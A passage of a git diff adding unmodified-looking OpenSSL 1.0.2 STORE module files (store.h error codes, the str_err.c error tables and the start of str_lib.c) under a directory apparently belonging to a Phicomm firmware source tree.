+X509_NAME *STORE_ATTR_INFO_get0_dn(STORE_ATTR_INFO *attrs,
+                                   STORE_ATTR_TYPES code);
+BIGNUM *STORE_ATTR_INFO_get0_number(STORE_ATTR_INFO *attrs,
+                                    STORE_ATTR_TYPES code);
+int STORE_ATTR_INFO_set_cstr(STORE_ATTR_INFO *attrs, STORE_ATTR_TYPES code,
+                             char *cstr, size_t cstr_size);
+int STORE_ATTR_INFO_set_sha1str(STORE_ATTR_INFO *attrs, STORE_ATTR_TYPES code,
+                                unsigned char *sha1str, size_t sha1str_size);
+int STORE_ATTR_INFO_set_dn(STORE_ATTR_INFO *attrs, STORE_ATTR_TYPES code,
+                           X509_NAME *dn);
+int STORE_ATTR_INFO_set_number(STORE_ATTR_INFO *attrs, STORE_ATTR_TYPES code,
+                               BIGNUM *number);
+int STORE_ATTR_INFO_modify_cstr(STORE_ATTR_INFO *attrs, STORE_ATTR_TYPES code,
+                                char *cstr, size_t cstr_size);
+int STORE_ATTR_INFO_modify_sha1str(STORE_ATTR_INFO *attrs,
+                                   STORE_ATTR_TYPES code,
+                                   unsigned char *sha1str,
+                                   size_t sha1str_size);
+int STORE_ATTR_INFO_modify_dn(STORE_ATTR_INFO *attrs, STORE_ATTR_TYPES code,
+                              X509_NAME *dn);
+int STORE_ATTR_INFO_modify_number(STORE_ATTR_INFO *attrs,
+                                  STORE_ATTR_TYPES code, BIGNUM *number);
+
+/*
+ * Compare on basis of a bit pattern formed by the STORE_ATTR_TYPES values in
+ * each contained attribute.
+ */
+int STORE_ATTR_INFO_compare(const STORE_ATTR_INFO *const *a,
+                            const STORE_ATTR_INFO *const *b);
+/*
+ * Check if the set of attributes in a is within the range of attributes set
+ * in b.
+ */
+int STORE_ATTR_INFO_in_range(STORE_ATTR_INFO *a, STORE_ATTR_INFO *b);
+/* Check if the set of attributes in a are also set in b. */
+int STORE_ATTR_INFO_in(STORE_ATTR_INFO *a, STORE_ATTR_INFO *b);
+/* Same as STORE_ATTR_INFO_in(), but also checks the attribute values. */
+int STORE_ATTR_INFO_in_ex(STORE_ATTR_INFO *a, STORE_ATTR_INFO *b);
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_STORE_strings(void);
+
+/* Error codes for the STORE functions. */
+
+/* Function codes. */
+# define STORE_F_MEM_DELETE                               134
+# define STORE_F_MEM_GENERATE                             135
+# define STORE_F_MEM_LIST_END                             168
+# define STORE_F_MEM_LIST_NEXT                            136
+# define STORE_F_MEM_LIST_START                           137
+# define STORE_F_MEM_MODIFY                               169
+# define STORE_F_MEM_STORE                                138
+# define STORE_F_STORE_ATTR_INFO_GET0_CSTR                139
+# define STORE_F_STORE_ATTR_INFO_GET0_DN                  140
+# define STORE_F_STORE_ATTR_INFO_GET0_NUMBER              141
+# define STORE_F_STORE_ATTR_INFO_GET0_SHA1STR             142
+# define STORE_F_STORE_ATTR_INFO_MODIFY_CSTR              143
+# define STORE_F_STORE_ATTR_INFO_MODIFY_DN                144
+# define STORE_F_STORE_ATTR_INFO_MODIFY_NUMBER            145
+# define STORE_F_STORE_ATTR_INFO_MODIFY_SHA1STR           146
+# define STORE_F_STORE_ATTR_INFO_SET_CSTR                 147
+# define STORE_F_STORE_ATTR_INFO_SET_DN                   148
+# define STORE_F_STORE_ATTR_INFO_SET_NUMBER               149
+# define STORE_F_STORE_ATTR_INFO_SET_SHA1STR              150
+# define STORE_F_STORE_CERTIFICATE                        170
+# define STORE_F_STORE_CTRL                               161
+# define STORE_F_STORE_DELETE_ARBITRARY                   158
+# define STORE_F_STORE_DELETE_CERTIFICATE                 102
+# define STORE_F_STORE_DELETE_CRL                         103
+# define STORE_F_STORE_DELETE_NUMBER                      104
+# define STORE_F_STORE_DELETE_PRIVATE_KEY                 105
+# define STORE_F_STORE_DELETE_PUBLIC_KEY                  106
+# define STORE_F_STORE_GENERATE_CRL                       107
+# define STORE_F_STORE_GENERATE_KEY                       108
+# define STORE_F_STORE_GET_ARBITRARY                      159
+# define STORE_F_STORE_GET_CERTIFICATE                    109
+# define STORE_F_STORE_GET_CRL                            110
+# define STORE_F_STORE_GET_NUMBER                         111
+# define STORE_F_STORE_GET_PRIVATE_KEY                    112
+# define STORE_F_STORE_GET_PUBLIC_KEY                     113
+# define STORE_F_STORE_LIST_CERTIFICATE_END               114
+# define STORE_F_STORE_LIST_CERTIFICATE_ENDP              153
+# define STORE_F_STORE_LIST_CERTIFICATE_NEXT              115
+# define STORE_F_STORE_LIST_CERTIFICATE_START             116
+# define STORE_F_STORE_LIST_CRL_END                       117
+# define STORE_F_STORE_LIST_CRL_ENDP                      154
+# define STORE_F_STORE_LIST_CRL_NEXT                      118
+# define STORE_F_STORE_LIST_CRL_START                     119
+# define STORE_F_STORE_LIST_PRIVATE_KEY_END               120
+# define STORE_F_STORE_LIST_PRIVATE_KEY_ENDP              155
+# define STORE_F_STORE_LIST_PRIVATE_KEY_NEXT              121
+# define STORE_F_STORE_LIST_PRIVATE_KEY_START             122
+# define STORE_F_STORE_LIST_PUBLIC_KEY_END                123
+# define STORE_F_STORE_LIST_PUBLIC_KEY_ENDP               156
+# define STORE_F_STORE_LIST_PUBLIC_KEY_NEXT               124
+# define STORE_F_STORE_LIST_PUBLIC_KEY_START              125
+# define STORE_F_STORE_MODIFY_ARBITRARY                   162
+# define STORE_F_STORE_MODIFY_CERTIFICATE                 163
+# define STORE_F_STORE_MODIFY_CRL                         164
+# define STORE_F_STORE_MODIFY_NUMBER                      165
+# define STORE_F_STORE_MODIFY_PRIVATE_KEY                 166
+# define STORE_F_STORE_MODIFY_PUBLIC_KEY                  167
+# define STORE_F_STORE_NEW_ENGINE                         133
+# define STORE_F_STORE_NEW_METHOD                         132
+# define STORE_F_STORE_PARSE_ATTRS_END                    151
+# define STORE_F_STORE_PARSE_ATTRS_ENDP                   172
+# define STORE_F_STORE_PARSE_ATTRS_NEXT                   152
+# define STORE_F_STORE_PARSE_ATTRS_START                  171
+# define STORE_F_STORE_REVOKE_CERTIFICATE                 129
+# define STORE_F_STORE_REVOKE_PRIVATE_KEY                 130
+# define STORE_F_STORE_REVOKE_PUBLIC_KEY                  131
+# define STORE_F_STORE_STORE_ARBITRARY                    157
+# define STORE_F_STORE_STORE_CERTIFICATE                  100
+# define STORE_F_STORE_STORE_CRL                          101
+# define STORE_F_STORE_STORE_NUMBER                       126
+# define STORE_F_STORE_STORE_PRIVATE_KEY                  127
+# define STORE_F_STORE_STORE_PUBLIC_KEY                   128
+
+/* Reason codes. */
+# define STORE_R_ALREADY_HAS_A_VALUE                      127
+# define STORE_R_FAILED_DELETING_ARBITRARY                132
+# define STORE_R_FAILED_DELETING_CERTIFICATE              100
+# define STORE_R_FAILED_DELETING_KEY                      101
+# define STORE_R_FAILED_DELETING_NUMBER                   102
+# define STORE_R_FAILED_GENERATING_CRL                    103
+# define STORE_R_FAILED_GENERATING_KEY                    104
+# define STORE_R_FAILED_GETTING_ARBITRARY                 133
+# define STORE_R_FAILED_GETTING_CERTIFICATE               105
+# define STORE_R_FAILED_GETTING_KEY                       106
+# define STORE_R_FAILED_GETTING_NUMBER                    107
+# define STORE_R_FAILED_LISTING_CERTIFICATES              108
+# define STORE_R_FAILED_LISTING_KEYS                      109
+# define STORE_R_FAILED_MODIFYING_ARBITRARY               138
+# define STORE_R_FAILED_MODIFYING_CERTIFICATE             139
+# define STORE_R_FAILED_MODIFYING_CRL                     140
+# define STORE_R_FAILED_MODIFYING_NUMBER                  141
+# define STORE_R_FAILED_MODIFYING_PRIVATE_KEY             142
+# define STORE_R_FAILED_MODIFYING_PUBLIC_KEY              143
+# define STORE_R_FAILED_REVOKING_CERTIFICATE              110
+# define STORE_R_FAILED_REVOKING_KEY                      111
+# define STORE_R_FAILED_STORING_ARBITRARY                 134
+# define STORE_R_FAILED_STORING_CERTIFICATE               112
+# define STORE_R_FAILED_STORING_KEY                       113
+# define STORE_R_FAILED_STORING_NUMBER                    114
+# define STORE_R_NOT_IMPLEMENTED                          128
+# define STORE_R_NO_CONTROL_FUNCTION                      144
+# define STORE_R_NO_DELETE_ARBITRARY_FUNCTION             135
+# define STORE_R_NO_DELETE_NUMBER_FUNCTION                115
+# define STORE_R_NO_DELETE_OBJECT_FUNCTION                116
+# define STORE_R_NO_GENERATE_CRL_FUNCTION                 117
+# define STORE_R_NO_GENERATE_OBJECT_FUNCTION              118
+# define STORE_R_NO_GET_OBJECT_ARBITRARY_FUNCTION         136
+# define STORE_R_NO_GET_OBJECT_FUNCTION                   119
+# define STORE_R_NO_GET_OBJECT_NUMBER_FUNCTION            120
+# define STORE_R_NO_LIST_OBJECT_ENDP_FUNCTION             131
+# define STORE_R_NO_LIST_OBJECT_END_FUNCTION              121
+# define STORE_R_NO_LIST_OBJECT_NEXT_FUNCTION             122
+# define STORE_R_NO_LIST_OBJECT_START_FUNCTION            123
+# define STORE_R_NO_MODIFY_OBJECT_FUNCTION                145
+# define STORE_R_NO_REVOKE_OBJECT_FUNCTION                124
+# define STORE_R_NO_STORE                                 129
+# define STORE_R_NO_STORE_OBJECT_ARBITRARY_FUNCTION       137
+# define STORE_R_NO_STORE_OBJECT_FUNCTION                 125
+# define STORE_R_NO_STORE_OBJECT_NUMBER_FUNCTION          126
+# define STORE_R_NO_VALUE                                 130
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/store/str_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/store/str_err.c
new file mode 100644
index 0000000..9858e60
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/store/str_err.c
@@ -0,0 +1,258 @@
+/* crypto/store/str_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/store.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_STORE,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_STORE,0,reason)
+
+static ERR_STRING_DATA STORE_str_functs[] = {
+    {ERR_FUNC(STORE_F_MEM_DELETE), "MEM_DELETE"},
+    {ERR_FUNC(STORE_F_MEM_GENERATE), "MEM_GENERATE"},
+    {ERR_FUNC(STORE_F_MEM_LIST_END), "MEM_LIST_END"},
+    {ERR_FUNC(STORE_F_MEM_LIST_NEXT), "MEM_LIST_NEXT"},
+    {ERR_FUNC(STORE_F_MEM_LIST_START), "MEM_LIST_START"},
+    {ERR_FUNC(STORE_F_MEM_MODIFY), "MEM_MODIFY"},
+    {ERR_FUNC(STORE_F_MEM_STORE), "MEM_STORE"},
+    {ERR_FUNC(STORE_F_STORE_ATTR_INFO_GET0_CSTR),
+     "STORE_ATTR_INFO_get0_cstr"},
+    {ERR_FUNC(STORE_F_STORE_ATTR_INFO_GET0_DN), "STORE_ATTR_INFO_get0_dn"},
+    {ERR_FUNC(STORE_F_STORE_ATTR_INFO_GET0_NUMBER),
+     "STORE_ATTR_INFO_get0_number"},
+    {ERR_FUNC(STORE_F_STORE_ATTR_INFO_GET0_SHA1STR),
+     "STORE_ATTR_INFO_get0_sha1str"},
+    {ERR_FUNC(STORE_F_STORE_ATTR_INFO_MODIFY_CSTR),
+     "STORE_ATTR_INFO_modify_cstr"},
+    {ERR_FUNC(STORE_F_STORE_ATTR_INFO_MODIFY_DN),
+     "STORE_ATTR_INFO_modify_dn"},
+    {ERR_FUNC(STORE_F_STORE_ATTR_INFO_MODIFY_NUMBER),
+     "STORE_ATTR_INFO_modify_number"},
+    {ERR_FUNC(STORE_F_STORE_ATTR_INFO_MODIFY_SHA1STR),
+     "STORE_ATTR_INFO_modify_sha1str"},
+    {ERR_FUNC(STORE_F_STORE_ATTR_INFO_SET_CSTR), "STORE_ATTR_INFO_set_cstr"},
+    {ERR_FUNC(STORE_F_STORE_ATTR_INFO_SET_DN), "STORE_ATTR_INFO_set_dn"},
+    {ERR_FUNC(STORE_F_STORE_ATTR_INFO_SET_NUMBER),
+     "STORE_ATTR_INFO_set_number"},
+    {ERR_FUNC(STORE_F_STORE_ATTR_INFO_SET_SHA1STR),
+     "STORE_ATTR_INFO_set_sha1str"},
+    {ERR_FUNC(STORE_F_STORE_CERTIFICATE), "STORE_CERTIFICATE"},
+    {ERR_FUNC(STORE_F_STORE_CTRL), "STORE_ctrl"},
+    {ERR_FUNC(STORE_F_STORE_DELETE_ARBITRARY), "STORE_delete_arbitrary"},
+    {ERR_FUNC(STORE_F_STORE_DELETE_CERTIFICATE), "STORE_delete_certificate"},
+    {ERR_FUNC(STORE_F_STORE_DELETE_CRL), "STORE_delete_crl"},
+    {ERR_FUNC(STORE_F_STORE_DELETE_NUMBER), "STORE_delete_number"},
+    {ERR_FUNC(STORE_F_STORE_DELETE_PRIVATE_KEY), "STORE_delete_private_key"},
+    {ERR_FUNC(STORE_F_STORE_DELETE_PUBLIC_KEY), "STORE_delete_public_key"},
+    {ERR_FUNC(STORE_F_STORE_GENERATE_CRL), "STORE_generate_crl"},
+    {ERR_FUNC(STORE_F_STORE_GENERATE_KEY), "STORE_generate_key"},
+    {ERR_FUNC(STORE_F_STORE_GET_ARBITRARY), "STORE_get_arbitrary"},
+    {ERR_FUNC(STORE_F_STORE_GET_CERTIFICATE), "STORE_get_certificate"},
+    {ERR_FUNC(STORE_F_STORE_GET_CRL), "STORE_get_crl"},
+    {ERR_FUNC(STORE_F_STORE_GET_NUMBER), "STORE_get_number"},
+    {ERR_FUNC(STORE_F_STORE_GET_PRIVATE_KEY), "STORE_get_private_key"},
+    {ERR_FUNC(STORE_F_STORE_GET_PUBLIC_KEY), "STORE_get_public_key"},
+    {ERR_FUNC(STORE_F_STORE_LIST_CERTIFICATE_END),
+     "STORE_list_certificate_end"},
+    {ERR_FUNC(STORE_F_STORE_LIST_CERTIFICATE_ENDP),
+     "STORE_list_certificate_endp"},
+    {ERR_FUNC(STORE_F_STORE_LIST_CERTIFICATE_NEXT),
+     "STORE_list_certificate_next"},
+    {ERR_FUNC(STORE_F_STORE_LIST_CERTIFICATE_START),
+     "STORE_list_certificate_start"},
+    {ERR_FUNC(STORE_F_STORE_LIST_CRL_END), "STORE_list_crl_end"},
+    {ERR_FUNC(STORE_F_STORE_LIST_CRL_ENDP), "STORE_list_crl_endp"},
+    {ERR_FUNC(STORE_F_STORE_LIST_CRL_NEXT), "STORE_list_crl_next"},
+    {ERR_FUNC(STORE_F_STORE_LIST_CRL_START), "STORE_list_crl_start"},
+    {ERR_FUNC(STORE_F_STORE_LIST_PRIVATE_KEY_END),
+     "STORE_list_private_key_end"},
+    {ERR_FUNC(STORE_F_STORE_LIST_PRIVATE_KEY_ENDP),
+     "STORE_list_private_key_endp"},
+    {ERR_FUNC(STORE_F_STORE_LIST_PRIVATE_KEY_NEXT),
+     "STORE_list_private_key_next"},
+    {ERR_FUNC(STORE_F_STORE_LIST_PRIVATE_KEY_START),
+     "STORE_list_private_key_start"},
+    {ERR_FUNC(STORE_F_STORE_LIST_PUBLIC_KEY_END),
+     "STORE_list_public_key_end"},
+    {ERR_FUNC(STORE_F_STORE_LIST_PUBLIC_KEY_ENDP),
+     "STORE_list_public_key_endp"},
+    {ERR_FUNC(STORE_F_STORE_LIST_PUBLIC_KEY_NEXT),
+     "STORE_list_public_key_next"},
+    {ERR_FUNC(STORE_F_STORE_LIST_PUBLIC_KEY_START),
+     "STORE_list_public_key_start"},
+    {ERR_FUNC(STORE_F_STORE_MODIFY_ARBITRARY), "STORE_modify_arbitrary"},
+    {ERR_FUNC(STORE_F_STORE_MODIFY_CERTIFICATE), "STORE_modify_certificate"},
+    {ERR_FUNC(STORE_F_STORE_MODIFY_CRL), "STORE_modify_crl"},
+    {ERR_FUNC(STORE_F_STORE_MODIFY_NUMBER), "STORE_modify_number"},
+    {ERR_FUNC(STORE_F_STORE_MODIFY_PRIVATE_KEY), "STORE_modify_private_key"},
+    {ERR_FUNC(STORE_F_STORE_MODIFY_PUBLIC_KEY), "STORE_modify_public_key"},
+    {ERR_FUNC(STORE_F_STORE_NEW_ENGINE), "STORE_new_engine"},
+    {ERR_FUNC(STORE_F_STORE_NEW_METHOD), "STORE_new_method"},
+    {ERR_FUNC(STORE_F_STORE_PARSE_ATTRS_END), "STORE_parse_attrs_end"},
+    {ERR_FUNC(STORE_F_STORE_PARSE_ATTRS_ENDP), "STORE_parse_attrs_endp"},
+    {ERR_FUNC(STORE_F_STORE_PARSE_ATTRS_NEXT), "STORE_parse_attrs_next"},
+    {ERR_FUNC(STORE_F_STORE_PARSE_ATTRS_START), "STORE_parse_attrs_start"},
+    {ERR_FUNC(STORE_F_STORE_REVOKE_CERTIFICATE), "STORE_revoke_certificate"},
+    {ERR_FUNC(STORE_F_STORE_REVOKE_PRIVATE_KEY), "STORE_revoke_private_key"},
+    {ERR_FUNC(STORE_F_STORE_REVOKE_PUBLIC_KEY), "STORE_revoke_public_key"},
+    {ERR_FUNC(STORE_F_STORE_STORE_ARBITRARY), "STORE_store_arbitrary"},
+    {ERR_FUNC(STORE_F_STORE_STORE_CERTIFICATE), "STORE_store_certificate"},
+    {ERR_FUNC(STORE_F_STORE_STORE_CRL), "STORE_store_crl"},
+    {ERR_FUNC(STORE_F_STORE_STORE_NUMBER), "STORE_store_number"},
+    {ERR_FUNC(STORE_F_STORE_STORE_PRIVATE_KEY), "STORE_store_private_key"},
+    {ERR_FUNC(STORE_F_STORE_STORE_PUBLIC_KEY), "STORE_store_public_key"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA STORE_str_reasons[] = {
+    {ERR_REASON(STORE_R_ALREADY_HAS_A_VALUE), "already has a value"},
+    {ERR_REASON(STORE_R_FAILED_DELETING_ARBITRARY),
+     "failed deleting arbitrary"},
+    {ERR_REASON(STORE_R_FAILED_DELETING_CERTIFICATE),
+     "failed deleting certificate"},
+    {ERR_REASON(STORE_R_FAILED_DELETING_KEY), "failed deleting key"},
+    {ERR_REASON(STORE_R_FAILED_DELETING_NUMBER), "failed deleting number"},
+    {ERR_REASON(STORE_R_FAILED_GENERATING_CRL), "failed generating crl"},
+    {ERR_REASON(STORE_R_FAILED_GENERATING_KEY), "failed generating key"},
+    {ERR_REASON(STORE_R_FAILED_GETTING_ARBITRARY),
+     "failed getting arbitrary"},
+    {ERR_REASON(STORE_R_FAILED_GETTING_CERTIFICATE),
+     "failed getting certificate"},
+    {ERR_REASON(STORE_R_FAILED_GETTING_KEY), "failed getting key"},
+    {ERR_REASON(STORE_R_FAILED_GETTING_NUMBER), "failed getting number"},
+    {ERR_REASON(STORE_R_FAILED_LISTING_CERTIFICATES),
+     "failed listing certificates"},
+    {ERR_REASON(STORE_R_FAILED_LISTING_KEYS), "failed listing keys"},
+    {ERR_REASON(STORE_R_FAILED_MODIFYING_ARBITRARY),
+     "failed modifying arbitrary"},
+    {ERR_REASON(STORE_R_FAILED_MODIFYING_CERTIFICATE),
+     "failed modifying certificate"},
+    {ERR_REASON(STORE_R_FAILED_MODIFYING_CRL), "failed modifying crl"},
+    {ERR_REASON(STORE_R_FAILED_MODIFYING_NUMBER), "failed modifying number"},
+    {ERR_REASON(STORE_R_FAILED_MODIFYING_PRIVATE_KEY),
+     "failed modifying private key"},
+    {ERR_REASON(STORE_R_FAILED_MODIFYING_PUBLIC_KEY),
+     "failed modifying public key"},
+    {ERR_REASON(STORE_R_FAILED_REVOKING_CERTIFICATE),
+     "failed revoking certificate"},
+    {ERR_REASON(STORE_R_FAILED_REVOKING_KEY), "failed revoking key"},
+    {ERR_REASON(STORE_R_FAILED_STORING_ARBITRARY),
+     "failed storing arbitrary"},
+    {ERR_REASON(STORE_R_FAILED_STORING_CERTIFICATE),
+     "failed storing certificate"},
+    {ERR_REASON(STORE_R_FAILED_STORING_KEY), "failed storing key"},
+    {ERR_REASON(STORE_R_FAILED_STORING_NUMBER), "failed storing number"},
+    {ERR_REASON(STORE_R_NOT_IMPLEMENTED), "not implemented"},
+    {ERR_REASON(STORE_R_NO_CONTROL_FUNCTION), "no control function"},
+    {ERR_REASON(STORE_R_NO_DELETE_ARBITRARY_FUNCTION),
+     "no delete arbitrary function"},
+    {ERR_REASON(STORE_R_NO_DELETE_NUMBER_FUNCTION),
+     "no delete number function"},
+    {ERR_REASON(STORE_R_NO_DELETE_OBJECT_FUNCTION),
+     "no delete object function"},
+    {ERR_REASON(STORE_R_NO_GENERATE_CRL_FUNCTION),
+     "no generate crl function"},
+    {ERR_REASON(STORE_R_NO_GENERATE_OBJECT_FUNCTION),
+     "no generate object function"},
+    {ERR_REASON(STORE_R_NO_GET_OBJECT_ARBITRARY_FUNCTION),
+     "no get object arbitrary function"},
+    {ERR_REASON(STORE_R_NO_GET_OBJECT_FUNCTION), "no get object function"},
+    {ERR_REASON(STORE_R_NO_GET_OBJECT_NUMBER_FUNCTION),
+     "no get object number function"},
+    {ERR_REASON(STORE_R_NO_LIST_OBJECT_ENDP_FUNCTION),
+     "no list object endp function"},
+    {ERR_REASON(STORE_R_NO_LIST_OBJECT_END_FUNCTION),
+     "no list object end function"},
+    {ERR_REASON(STORE_R_NO_LIST_OBJECT_NEXT_FUNCTION),
+     "no list object next function"},
+    {ERR_REASON(STORE_R_NO_LIST_OBJECT_START_FUNCTION),
+     "no list object start function"},
+    {ERR_REASON(STORE_R_NO_MODIFY_OBJECT_FUNCTION),
+     "no modify object function"},
+    {ERR_REASON(STORE_R_NO_REVOKE_OBJECT_FUNCTION),
+     "no revoke object function"},
+    {ERR_REASON(STORE_R_NO_STORE), "no store"},
+    {ERR_REASON(STORE_R_NO_STORE_OBJECT_ARBITRARY_FUNCTION),
+     "no store object arbitrary function"},
+    {ERR_REASON(STORE_R_NO_STORE_OBJECT_FUNCTION),
+     "no store object function"},
+    {ERR_REASON(STORE_R_NO_STORE_OBJECT_NUMBER_FUNCTION),
+     "no store object number function"},
+    {ERR_REASON(STORE_R_NO_VALUE), "no value"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_STORE_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(STORE_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, STORE_str_functs);
+        ERR_load_strings(0, STORE_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/store/str_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/store/str_lib.c
new file mode 100644
index 0000000..227b797
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/store/str_lib.c
@@ -0,0 +1,1772 @@
+/* crypto/store/str_lib.c -*- mode:C; c-file-style: "eay" -*- */
+/*
+ * Written by Richard Levitte (richard@levitte.org) for the OpenSSL project
+ * 2003.
+ */
+/* ====================================================================
+ * Copyright (c) 2003 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <string.h>
+#include <openssl/bn.h>
+#include <openssl/err.h>
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+#include <openssl/sha.h>
+#include <openssl/x509.h>
+#include "str_locl.h"
+
+const char *const STORE_object_type_string[STORE_OBJECT_TYPE_NUM + 1] = {
+    0,
+    "X.509 Certificate",
+    "X.509 CRL",
+    "Private Key",
+    "Public Key",
+    "Number",
+    "Arbitrary Data"
+};
+
+const int STORE_param_sizes[STORE_PARAM_TYPE_NUM + 1] = {
+    0,
+    sizeof(int),                /* EVP_TYPE */
+    sizeof(size_t),             /* BITS */
+    -1,                         /* KEY_PARAMETERS */
+    0                           /* KEY_NO_PARAMETERS */
+};
+
+const int STORE_attr_sizes[STORE_ATTR_TYPE_NUM + 1] = {
+    0,
+    -1,                         /* FRIENDLYNAME: C string */
+    SHA_DIGEST_LENGTH,          /* KEYID: SHA1 digest, 160 bits */
+    SHA_DIGEST_LENGTH,          /* ISSUERKEYID: SHA1 digest, 160 bits */
+    SHA_DIGEST_LENGTH,          /* SUBJECTKEYID: SHA1 digest, 160 bits */
+    SHA_DIGEST_LENGTH,          /* ISSUERSERIALHASH: SHA1 digest, 160 bits */
+    sizeof(X509_NAME *),        /* ISSUER: X509_NAME * */
+    sizeof(BIGNUM *),           /* SERIAL: BIGNUM * */
+    sizeof(X509_NAME *),        /* SUBJECT: X509_NAME * */
+    SHA_DIGEST_LENGTH,          /* CERTHASH: SHA1 digest, 160 bits */
+    -1,                         /* EMAIL: C string */
+    -1,                         /* FILENAME: C string */
+};
+
+STORE *STORE_new_method(const STORE_METHOD *method)
+{
